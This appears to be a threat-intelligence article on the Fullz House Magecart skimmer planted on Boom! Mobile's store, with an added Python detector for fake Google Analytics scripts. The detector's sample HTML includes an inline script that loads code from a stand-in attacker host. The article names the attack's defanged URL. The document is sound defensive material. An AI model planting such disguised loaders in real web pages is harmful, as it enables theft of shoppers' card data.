Fullz House Introduces Enhancements into Card Skimming Attacks

Credit card skimming attacks have evolved continuously over the past few years. Recently, a new hacking group has been observed targeting e-commerce websites with enhanced variants of skimming attacks that include additional capabilities such as keylogging and phishing.

What has been discovered?

The hacking group Fullz House was observed targeting the U.S.-based mobile virtual network operator (MVNO) Boom! Mobile via a Magecart attack.
  • The attackers injected a single line of JavaScript code (a credit card stealer script) on Boom's shopping cart-based e-commerce platform.
  • The script is disguised as a Google Analytics script that loads an external JavaScript library from the URL paypal-debit[.]com/cdn/ga.js.
  • In addition to the usual task of harvesting data, this script works more like a keylogger that continuously checks input fields for changes. As soon as any change is detected, it exfiltrates that data.
  • This skimmer also acts as a phishing tool that can redirect users from the compromised website to fake payment pages, which mimic the legitimate payment portals and are designed to work like a man-in-the-middle attack.
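
A defender-side check for the disguise described above, as an added example that is not from the original article: it flags scripts that carry a Google Analytics file name but load from a host outside an allowlist, whether referenced by a src attribute or built inside an inline script. The allowlist, the name find_fake_analytics and the sample host paypal-debit.example (standing in for the defanged URL in the article) are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this shop expects its Google Analytics loaders to come from.
GA_HOSTS = {"www.google-analytics.com", "ssl.google-analytics.com", "www.googletagmanager.com"}
# File names a Google Analytics loader normally carries.
GA_FILENAMES = {"ga.js", "analytics.js", "gtag.js", "gtm.js"}
# Absolute or protocol-relative .js URLs inside inline script text.
JS_URL = re.compile(r"""(?:https?:)?//[^\s'"<>]+?\.js\b""", re.I)

class ScriptCollector(HTMLParser):
    """Collects script URLs from src attributes and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.urls, self._in_script = [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.urls.append(src.strip())

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.urls.extend(JS_URL.findall(data))

def find_fake_analytics(html):
    """Return (host, url) for GA-named scripts served from non-allowlisted hosts."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for url in collector.urls:
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()  # empty for relative, first-party paths
        name = parsed.path.rsplit("/", 1)[-1].lower()
        if host and name in GA_FILENAMES and host not in GA_HOSTS:
            findings.append((host, url))
    return findings

# Constructed sample: paypal-debit.example stands in for the article's defanged host.
SAMPLE = """<script async src="https://www.google-analytics.com/analytics.js"></script>
<script>var s=document.createElement('script');s.src='//paypal-debit.example/cdn/ga.js';document.head.appendChild(s);</script>"""
```

Running find_fake_analytics over saved copies of the cart and checkout pages on a schedule gives an early signal when a look-alike analytics loader appears.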

Recent Magecart attacks

In the past few months, there have been some notable incidents in which e-commerce sites were targeted by Magecart groups.
  • In mid-September, attackers compromised almost 2,000 online stores via a typical Magecart attack, injecting malicious code into Magento sites to steal credit card details.
  • At the beginning of September, Magecart-affiliated hackers were observed using the encrypted messaging service Telegram to send information about stolen credit cards to their C2 servers.

Conclusion

Magecart attacks have proved consistently troublesome for e-commerce platforms across the globe, and the frequent new enhancements indicate that attackers are not planning to slow down their attempts. Experts therefore recommend that organizations stay protected by keeping all applications and third-party plugins updated and by conducting regular audits for vulnerabilities in their infrastructure.